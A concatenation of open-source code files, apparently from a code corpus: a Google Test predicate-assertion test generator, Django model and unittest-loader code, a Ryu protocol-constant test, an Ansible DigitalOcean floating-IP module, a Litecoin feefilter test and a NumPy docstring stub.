// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
// Regression test for gtest_pred_impl.h
//
// This file is generated by a script and quite long. If you intend to
// learn how Google Test works by reading its unit tests, read
// gtest_unittest.cc instead.
//
// This is intended as a regression test for the Google Test predicate
// assertions. We compile it as part of the gtest_unittest target
// only to keep the implementation tidy and compact, as it is quite
// involved to set up the stage for testing Google Test using Google
// Test itself.
//
// Currently, gtest_unittest takes ~11 seconds to run in the testing
// daemon. In the future, if it grows too large and needs much more
// time to finish, we should consider separating this file into a
// stand-alone regression test.
#include <iostream>
#include "gtest/gtest.h"
#include "gtest/gtest-spi.h"
// A user-defined data type.
struct Bool {
explicit Bool(int val) : value(val != 0) {}
bool operator>(int n) const { return value > Bool(n).value; }
Bool operator+(const Bool& rhs) const { return Bool(value + rhs.value); }
bool operator==(const Bool& rhs) const { return value == rhs.value; }
bool value;
};
// Enables Bool to be used in assertions.
std::ostream& operator<<(std::ostream& os, const Bool& x) {
return os << (x.value ? "true" : "false");
}
""" % DEFS)
def TestsForArity(n):
"""Returns the tests for n-ary predicate assertions."""
# A map that defines the values used in the template for the tests.
DEFS = {
'n' : n,
'es' : Iter(n, 'e%s', sep=', '),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'tvs' : Iter(n, 'T%s v%s', sep=', '),
'int_vs' : Iter(n, 'int v%s', sep=', '),
'Bool_vs' : Iter(n, 'Bool v%s', sep=', '),
'types' : Iter(n, 'typename T%s', sep=', '),
'v_sum' : Iter(n, 'v%s', sep=' + '),
'arity' : Arity(n),
'Arity' : Title(Arity(n)),
}
tests = (
"""// Sample functions/functors for testing %(arity)s predicate assertions.
// A %(arity)s predicate function.
template <%(types)s>
bool PredFunction%(n)s(%(tvs)s) {
return %(v_sum)s > 0;
}
// The following two functions are needed to circumvent a bug in
// gcc 2.95.3, which sometimes has problem with the above template
// function.
bool PredFunction%(n)sInt(%(int_vs)s) {
return %(v_sum)s > 0;
}
bool PredFunction%(n)sBool(%(Bool_vs)s) {
return %(v_sum)s > 0;
}
""" % DEFS)
tests += """
// A %(arity)s predicate functor.
struct PredFunctor%(n)s {
template <%(types)s>
bool operator()(""" % DEFS
tests += Iter(n, 'const T%s& v%s', sep=""",
""")
tests += """) {
return %(v_sum)s > 0;
}
};
""" % DEFS
tests += """
// A %(arity)s predicate-formatter function.
template <%(types)s>
testing::AssertionResult PredFormatFunction%(n)s(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) {
if (PredFunction%(n)s(%(vs)s))
return testing::AssertionSuccess();
return testing::AssertionFailure()
<< """ % DEFS
tests += Iter(n, 'e%s', sep=' << " + " << ')
tests += """
<< " is expected to be positive, but evaluates to "
<< %(v_sum)s << ".";
}
""" % DEFS
tests += """
// A %(arity)s predicate-formatter functor.
struct PredFormatFunctor%(n)s {
template <%(types)s>
testing::AssertionResult operator()(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) const {
return PredFormatFunction%(n)s(%(es)s, %(vs)s);
}
};
""" % DEFS
tests += """
// Tests for {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
class Predicate%(n)sTest : public testing::Test {
protected:
virtual void SetUp() {
expected_to_finish_ = true;
finished_ = false;""" % DEFS
tests += """
""" + Iter(n, 'n%s_ = ') + """0;
}
"""
tests += """
virtual void TearDown() {
// Verifies that each of the predicate's arguments was evaluated
// exactly once."""
tests += ''.join(["""
EXPECT_EQ(1, n%s_) <<
"The predicate assertion didn't evaluate argument %s "
"exactly once.";""" % (i, i + 1) for i in OneTo(n)])
tests += """
// Verifies that the control flow in the test function is expected.
if (expected_to_finish_ && !finished_) {
FAIL() << "The predicate assertion unexpactedly aborted the test.";
} else if (!expected_to_finish_ && finished_) {
FAIL() << "The failed predicate assertion didn't abort the test "
"as expected.";
}
}
// true iff the test function is expected to run to finish.
static bool expected_to_finish_;
// true iff the test function did run to finish.
static bool finished_;
""" % DEFS
tests += Iter(n, """
static int n%s_;""")
tests += """
};
bool Predicate%(n)sTest::expected_to_finish_;
bool Predicate%(n)sTest::finished_;
""" % DEFS
tests += Iter(n, """int Predicate%%(n)sTest::n%s_;
""") % DEFS
tests += """
typedef Predicate%(n)sTest EXPECT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest EXPECT_PRED%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED%(n)sTest;
""" % DEFS
def GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type):
"""Returns the test for a predicate assertion macro.
Args:
use_format: true iff the assertion is a *_PRED_FORMAT*.
use_assert: true iff the assertion is a ASSERT_*.
expect_failure: true iff the assertion is expected to fail.
use_functor: true iff the first argument of the assertion is
a functor (as opposed to a function)
use_user_type: true iff the predicate functor/function takes
argument(s) of a user-defined type.
Example:
GenTest(1, 0, 0, 1, 0) returns a test that tests the behavior
of a successful EXPECT_PRED_FORMATn() that takes a functor
whose arguments have built-in types."""
if use_assert:
assrt = 'ASSERT' # 'assert' is reserved, so we cannot use
# that identifier here.
else:
assrt = 'EXPECT'
assertion = assrt + '_PRED'
if use_format:
pred_format = 'PredFormat'
assertion += '_FORMAT'
else:
pred_format = 'Pred'
assertion += '%(n)s' % DEFS
if use_functor:
pred_format_type = 'functor'
pred_format += 'Functor%(n)s()'
else:
pred_format_type = 'function'
pred_format += 'Function%(n)s'
if not use_format:
if use_user_type:
pred_format += 'Bool'
else:
pred_format += 'Int'
test_name = pred_format_type.title()
if use_user_type:
arg_type = 'user-defined type (Bool)'
test_name += 'OnUserType'
if expect_failure:
arg = 'Bool(n%s_++)'
else:
arg = 'Bool(++n%s_)'
else:
arg_type = 'built-in type (int)'
test_name += 'OnBuiltInType'
if expect_failure:
arg = 'n%s_++'
else:
arg = '++n%s_'
if expect_failure:
successful_or_failed = 'failed'
expected_or_not = 'expected.'
test_name += 'Failure'
else:
successful_or_failed = 'successful'
expected_or_not = 'UNEXPECTED!'
test_name += 'Success'
# A map that defines the values used in the test template.
defs = DEFS.copy()
defs.update({
'assert' : assrt,
'assertion' : assertion,
'test_name' : test_name,
'pf_type' : pred_format_type,
'pf' : pred_format,
'arg_type' : arg_type,
'arg' : arg,
'successful' : successful_or_failed,
'expected' : expected_or_not,
})
test = """
// Tests a %(successful)s %(assertion)s where the
// predicate-formatter is a %(pf_type)s on a %(arg_type)s.
TEST_F(%(assertion)sTest, %(test_name)s) {""" % defs
indent = (len(assertion) + 3)*' '
extra_indent = ''
if expect_failure:
extra_indent = ' '
if use_assert:
test += """
expected_to_finish_ = false;
EXPECT_FATAL_FAILURE({ // NOLINT"""
else:
test += """
EXPECT_NONFATAL_FAILURE({ // NOLINT"""
test += '\n' + extra_indent + """ %(assertion)s(%(pf)s""" % defs
test = test % defs
test += Iter(n, ',\n' + indent + extra_indent + '%(arg)s' % defs)
test += ');\n' + extra_indent + ' finished_ = true;\n'
if expect_failure:
test += ' }, "");\n'
test += '}\n'
return test
# Generates tests for all 2**6 = 64 combinations.
tests += ''.join([GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type)
for use_format in [0, 1]
for use_assert in [0, 1]
for expect_failure in [0, 1]
for use_functor in [0, 1]
for use_user_type in [0, 1]
])
return tests
def UnitTestPostamble():
"""Returns the postamble for the tests."""
return ''
def GenerateUnitTest(n):
"""Returns the tests for up-to n-ary predicate assertions."""
GenerateFile(UNIT_TEST,
UnitTestPreamble()
+ ''.join([TestsForArity(i) for i in OneTo(n)])
+ UnitTestPostamble())
def _Main():
"""The entry point of the script. Generates the header file and its
unit test."""
if len(sys.argv) != 2:
print __doc__
print 'Author: ' + __author__
sys.exit(1)
n = int(sys.argv[1])
GenerateHeader(n)
GenerateUnitTest(n)
if __name__ == '__main__':
_Main()
| apache-2.0 |
Kazade/NeHe-Website | google_appengine/lib/django_1_2/tests/modeltests/m2m_intermediary/models.py | 92 | 1086 | """
9. Many-to-many relationships via an intermediary table
For many-to-many relationships that need extra fields on the intermediary
table, use an intermediary model.
In this example, an ``Article`` can have multiple ``Reporter`` objects, and
each ``Article``-``Reporter`` combination (a ``Writer``) has a ``position``
field, which specifies the ``Reporter``'s position for the given article
(e.g. "Staff writer").
"""
from django.db import models
class Reporter(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
def __unicode__(self):
return u"%s %s" % (self.first_name, self.last_name)
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateField()
def __unicode__(self):
return self.headline
class Writer(models.Model):
reporter = models.ForeignKey(Reporter)
article = models.ForeignKey(Article)
position = models.CharField(max_length=100)
def __unicode__(self):
return u'%s (%s)' % (self.reporter, self.position)
| bsd-3-clause |
zyq001/ryu | ryu/tests/unit/ofproto/test_inet.py | 63 | 1254 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
from nose.tools import eq_
from ryu.ofproto.inet import *
LOG = logging.getLogger('test_inet')
class TestInet(unittest.TestCase):
""" Test case for inet
"""
def test_ip_proto(self):
eq_(IPPROTO_IP, 0)
eq_(IPPROTO_HOPOPTS, 0)
eq_(IPPROTO_ICMP, 1)
eq_(IPPROTO_TCP, 6)
eq_(IPPROTO_UDP, 17)
eq_(IPPROTO_ROUTING, 43)
eq_(IPPROTO_FRAGMENT, 44)
eq_(IPPROTO_AH, 51)
eq_(IPPROTO_ICMPV6, 58)
eq_(IPPROTO_NONE, 59)
eq_(IPPROTO_DSTOPTS, 60)
eq_(IPPROTO_SCTP, 132)
| apache-2.0 |
sorenk/ansible | lib/ansible/modules/cloud/digital_ocean/digital_ocean_floating_ip.py | 23 | 9251 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Patrick F. Marques <patrickfmarques@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: digital_ocean_floating_ip
short_description: Manage DigitalOcean Floating IPs
description:
- Create/delete/assign a floating IP.
version_added: "2.4"
author: "Patrick Marques (@pmarques)"
options:
state:
description:
- Indicate desired state of the target.
default: present
choices: ['present', 'absent']
ip:
description:
- Public IP address of the Floating IP. Used to remove an IP
region:
description:
- The region that the Floating IP is reserved to.
droplet_id:
description:
- The Droplet that the Floating IP has been assigned to.
oauth_token:
description:
- DigitalOcean OAuth token.
required: true
notes:
- Version 2 of DigitalOcean API is used.
requirements:
- "python >= 2.6"
'''
EXAMPLES = '''
- name: "Create a Floating IP in region lon1"
digital_ocean_floating_ip:
state: present
region: lon1
- name: "Create a Floating IP assigned to Droplet ID 123456"
digital_ocean_floating_ip:
state: present
droplet_id: 123456
- name: "Delete a Floating IP with ip 1.2.3.4"
digital_ocean_floating_ip:
state: absent
ip: "1.2.3.4"
'''
RETURN = '''
# Digital Ocean API info https://developers.digitalocean.com/documentation/v2/#floating-ips
data:
description: a DigitalOcean Floating IP resource
returned: success and no resource constraint
type: dict
sample: {
"action": {
"id": 68212728,
"status": "in-progress",
"type": "assign_ip",
"started_at": "2015-10-15T17:45:44Z",
"completed_at": null,
"resource_id": 758603823,
"resource_type": "floating_ip",
"region": {
"name": "New York 3",
"slug": "nyc3",
"sizes": [
"512mb",
"1gb",
"2gb",
"4gb",
"8gb",
"16gb",
"32gb",
"48gb",
"64gb"
],
"features": [
"private_networking",
"backups",
"ipv6",
"metadata"
],
"available": true
},
"region_slug": "nyc3"
}
}
'''
import json
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.urls import fetch_url
class Response(object):
def __init__(self, resp, info):
self.body = None
if resp:
self.body = resp.read()
self.info = info
@property
def json(self):
if not self.body:
if "body" in self.info:
return json.loads(self.info["body"])
return None
try:
return json.loads(self.body)
except ValueError:
return None
@property
def status_code(self):
return self.info["status"]
class Rest(object):
def __init__(self, module, headers):
self.module = module
self.headers = headers
self.baseurl = 'https://api.digitalocean.com/v2'
def _url_builder(self, path):
if path[0] == '/':
path = path[1:]
return '%s/%s' % (self.baseurl, path)
def send(self, method, path, data=None, headers=None):
url = self._url_builder(path)
data = self.module.jsonify(data)
timeout = self.module.params['timeout']
resp, info = fetch_url(self.module, url, data=data, headers=self.headers, method=method, timeout=timeout)
# Exceptions in fetch_url may result in a status -1, the ensures a
if info['status'] == -1:
self.module.fail_json(msg=info['msg'])
return Response(resp, info)
def get(self, path, data=None, headers=None):
return self.send('GET', path, data, headers)
def put(self, path, data=None, headers=None):
return self.send('PUT', path, data, headers)
def post(self, path, data=None, headers=None):
return self.send('POST', path, data, headers)
def delete(self, path, data=None, headers=None):
return self.send('DELETE', path, data, headers)
def wait_action(module, rest, ip, action_id, timeout=10):
end_time = time.time() + 10
while time.time() < end_time:
response = rest.get('floating_ips/{0}/actions/{1}'.format(ip, action_id))
status_code = response.status_code
status = response.json['action']['status']
# TODO: check status_code == 200?
if status == 'completed':
return True
elif status == 'errored':
module.fail_json(msg='Floating ip action error [ip: {0}: action: {1}]'.format(
ip, action_id), data=json)
module.fail_json(msg='Floating ip action timeout [ip: {0}: action: {1}]'.format(
ip, action_id), data=json)
def core(module):
api_token = module.params['oauth_token']
state = module.params['state']
ip = module.params['ip']
droplet_id = module.params['droplet_id']
rest = Rest(module, {'Authorization': 'Bearer {0}'.format(api_token),
'Content-type': 'application/json'})
if state in ('present'):
if droplet_id is not None and module.params['ip'] is not None:
# Lets try to associate the ip to the specified droplet
associate_floating_ips(module, rest)
else:
create_floating_ips(module, rest)
elif state in ('absent'):
response = rest.delete("floating_ips/{0}".format(ip))
status_code = response.status_code
json_data = response.json
if status_code == 204:
module.exit_json(changed=True)
elif status_code == 404:
module.exit_json(changed=False)
else:
module.exit_json(changed=False, data=json_data)
def get_floating_ip_details(module, rest):
ip = module.params['ip']
response = rest.get("floating_ips/{0}".format(ip))
status_code = response.status_code
json_data = response.json
if status_code == 200:
return json_data['floating_ip']
else:
module.fail_json(msg="Error assigning floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def assign_floating_id_to_droplet(module, rest):
ip = module.params['ip']
payload = {
"type": "assign",
"droplet_id": module.params['droplet_id'],
}
response = rest.post("floating_ips/{0}/actions".format(ip), data=payload)
status_code = response.status_code
json_data = response.json
if status_code == 201:
wait_action(module, rest, ip, json_data['action']['id'])
module.exit_json(changed=True, data=json_data)
else:
module.fail_json(msg="Error creating floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def associate_floating_ips(module, rest):
floating_ip = get_floating_ip_details(module, rest)
droplet = floating_ip['droplet']
# TODO: If already assigned to a droplet verify if is one of the specified as valid
if droplet is not None and str(droplet['id']) in [module.params['droplet_id']]:
module.exit_json(changed=False)
else:
assign_floating_id_to_droplet(module, rest)
def create_floating_ips(module, rest):
payload = {
}
if module.params['region'] is not None:
payload["region"] = module.params['region']
if module.params['droplet_id'] is not None:
payload["droplet_id"] = module.params['droplet_id']
response = rest.post("floating_ips", data=payload)
status_code = response.status_code
json_data = response.json
if status_code == 202:
module.exit_json(changed=True, data=json_data)
else:
module.fail_json(msg="Error creating floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(choices=['present', 'absent'], default='present'),
ip=dict(aliases=['id'], required=False),
region=dict(required=False),
droplet_id=dict(required=False),
oauth_token=dict(
no_log=True,
# Support environment variable for DigitalOcean OAuth Token
fallback=(env_fallback, ['DO_API_TOKEN', 'DO_API_KEY', 'DO_OAUTH_TOKEN']),
required=True,
),
validate_certs=dict(type='bool', default=True),
timeout=dict(type='int', default=30),
),
required_if=([
('state', 'delete', ['ip'])
]),
mutually_exclusive=(
['region', 'droplet_id']
),
)
core(module)
if __name__ == '__main__':
main()
| gpl-3.0 |
vmp32k/litecoin | test/functional/p2p_feefilter.py | 23 | 3614 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from decimal import Decimal
import time
from test_framework.messages import msg_feefilter
from test_framework.mininode import mininode_lock, P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import sync_blocks, sync_mempools
def hashToHex(hash):
return format(hash, '064x')
# Wait up to 60 secs to see if the testnode has received all the expected invs
def allInvsMatch(invsExpected, testnode):
for x in range(60):
with mininode_lock:
if (sorted(invsExpected) == sorted(testnode.txinvs)):
return True
time.sleep(1)
return False
class TestP2PConn(P2PInterface):
def __init__(self):
super().__init__()
self.txinvs = []
def on_inv(self, message):
for i in message.inv:
if (i.type == 1):
self.txinvs.append(hashToHex(i.hash))
def clear_invs(self):
with mininode_lock:
self.txinvs = []
class FeeFilterTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node1 = self.nodes[1]
node0 = self.nodes[0]
# Get out of IBD
node1.generate(1)
sync_blocks(self.nodes)
self.nodes[0].add_p2p_connection(TestP2PConn())
# Test that invs are received for all txs at feerate of 20 sat/byte
node1.settxfee(Decimal("0.00020000"))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Set a filter of 15 sat/byte
self.nodes[0].p2p.send_and_ping(msg_feefilter(15000))
# Test that txs are still being received (paying 20 sat/byte)
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Change tx fee rate to 10 sat/byte and test they are no longer received
node1.settxfee(Decimal("0.00010000"))
[node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
sync_mempools(self.nodes) # must be sure node 0 has received all txs
# Send one transaction from node0 that should be received, so that we
# we can sync the test on receipt (if node1's txs were relayed, they'd
# be received by the time this node0 tx is received). This is
# unfortunately reliant on the current relay behavior where we batch up
# to 35 entries in an inv, which means that when this next transaction
# is eligible for relay, the prior transactions from node1 are eligible
# as well.
node0.settxfee(Decimal("0.00020000"))
txids = [node0.sendtoaddress(node0.getnewaddress(), 1)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Remove fee filter and check that txs are received again
self.nodes[0].p2p.send_and_ping(msg_feefilter(0))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
if __name__ == '__main__':
FeeFilterTest().main()
| mit |
orekyuu/intellij-community | python/testData/types/NumpyArrayType/numpy/core/multiarray.py | 79 | 7955 | def array(p_object, dtype=None, copy=True, order=None, subok=False, ndmin=0): # real signature unknown; restored from __doc__
"""
array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0)
Create an array.
Parameters
----------
object : array_like
An array, any object exposing the array interface, an
object whose __array__ method returns an array, or any
(nested) sequence.
dtype : data-type, optional
The desired data-type for the array. If not given, then
the type will be determined as the minimum type required
to hold the objects in the sequence. This argument can only
be used to 'upcast' the array. For downcasting, use the
.astype(t) method.
copy : bool, optional
If true (default), then the object is copied. Otherwise, a copy
will only be made if __array__ returns a copy, if obj is a
nested sequence, or if a copy is needed to satisfy any of the other
requirements (`dtype`, `order`, etc.).
order : {'C', 'F', 'A'}, optional
Specify the order of the array. If order is 'C' (default), then the
array will be in C-contiguous order (last-index varies the
fastest). If order is 'F', then the returned array
will be in Fortran-contiguous order (first-index varies the
fastest). If order is 'A', then the returned array may
be in any order (either C-, Fortran-contiguous, or even
discontiguous).
subok : bool, optional
If True, then sub-classes will be passed-through, otherwise
the returned array will be forced to be a base-class array (default).
ndmin : int, optional
Specifies the minimum number of dimensions that the resulting
array should have. Ones will be pre-pended to the shape as
needed to meet this requirement.
Returns
-------
out : ndarray
An array object satisfying the specified requirements.
See Also
--------
empty, empty_like, zeros, zeros_like, ones, ones_like, fill
Examples
--------
>>> np.array([1, 2, 3])
array([1, 2, 3])
Upcasting:
>>> np.array([1, 2, 3.0])
array([ 1., 2., 3.])
More than one dimension:
>>> np.array([[1, 2], [3, 4]])
array([[1, 2],
[3, 4]])
Minimum dimensions 2:
>>> np.array([1, 2, 3], ndmin=2)
array([[1, 2, 3]])
Type provided:
>>> np.array([1, 2, 3], dtype=complex)
array([ 1.+0.j, 2.+0.j, 3.+0.j])
Data-type consisting of more than one element:
>>> x = np.array([(1,2),(3,4)],dtype=[('a','<i4'),('b','<i4')])
>>> x['a']
array([1, 3])
Creating an array from sub-classes:
>>> np.array(np.mat('1 2; 3 4'))
array([[1, 2],
[3, 4]])
>>> np.array(np.mat('1 2; 3 4'), subok=True)
matrix([[1, 2],
[3, 4]])
"""
pass
class ndarray(object):
"""
ndarray(shape, dtype=float, buffer=None, offset=0,
strides=None, order=None)
An array object represents a multidimensional, homogeneous array
of fixed-size items. An associated data-type object describes the
format of each element in the array (its byte-order, how many bytes it
occupies in memory, whether it is an integer, a floating point number,
or something else, etc.)
Arrays should be constructed using `array`, `zeros` or `empty` (refer
to the See Also section below). The parameters given here refer to
a low-level method (`ndarray(...)`) for instantiating an array.
For more information, refer to the `numpy` module and examine the
the methods and attributes of an array.
Parameters
----------
(for the __new__ method; see Notes below)
shape : tuple of ints
Shape of created array.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type.
buffer : object exposing buffer interface, optional
Used to fill the array with data.
offset : int, optional
Offset of array data in buffer.
strides : tuple of ints, optional
Strides of data in memory.
order : {'C', 'F'}, optional
Row-major or column-major order.
Attributes
----------
T : ndarray
Transpose of the array.
data : buffer
The array's elements, in memory.
dtype : dtype object
Describes the format of the elements in the array.
flags : dict
Dictionary containing information related to memory use, e.g.,
'C_CONTIGUOUS', 'OWNDATA', 'WRITEABLE', etc.
flat : numpy.flatiter object
Flattened version of the array as an iterator. The iterator
allows assignments, e.g., ``x.flat = 3`` (See `ndarray.flat` for
assignment examples; TODO).
imag : ndarray
Imaginary part of the array.
real : ndarray
Real part of the array.
size : int
Number of elements in the array.
itemsize : int
The memory use of each array element in bytes.
nbytes : int
The total number of bytes required to store the array data,
i.e., ``itemsize * size``.
ndim : int
The array's number of dimensions.
shape : tuple of ints
Shape of the array.
strides : tuple of ints
The step-size required to move from one element to the next in
memory. For example, a contiguous ``(3, 4)`` array of type
``int16`` in C-order has strides ``(8, 2)``. This implies that
to move from element to element in memory requires jumps of 2 bytes.
To move from row-to-row, one needs to jump 8 bytes at a time
(``2 * 4``).
ctypes : ctypes object
Class containing properties of the array needed for interaction
with ctypes.
base : ndarray
If the array is a view into another array, that array is its `base`
(unless that array is also a view). The `base` array is where the
array data is actually stored.
See Also
--------
array : Construct an array.
zeros : Create an array, each element of which is zero.
empty : Create an array, but leave its allocated memory unchanged (i.e.,
it contains "garbage").
dtype : Create a data-type.
Notes
-----
There are two modes of creating an array using ``__new__``:
1. If `buffer` is None, then only `shape`, `dtype`, and `order`
are used.
2. If `buffer` is an object exposing the buffer interface, then
all keywords are interpreted.
No ``__init__`` method is needed because the array is fully initialized
after the ``__new__`` method.
Examples
--------
These examples illustrate the low-level `ndarray` constructor. Refer
to the `See Also` section above for easier ways of constructing an
ndarray.
First mode, `buffer` is None:
>>> np.ndarray(shape=(2,2), dtype=float, order='F')
array([[ -1.13698227e+002, 4.25087011e-303],
[ 2.88528414e-306, 3.27025015e-309]]) #random
Second mode:
>>> np.ndarray((2,), buffer=np.array([1,2,3]),
... offset=np.int_().itemsize,
... dtype=int) # offset = 1*itemsize, i.e. skip first element
array([2, 3])
"""
pass | apache-2.0 |
alx-eu/django | django/utils/unittest/loader.py | 109 | 13441 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, case.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
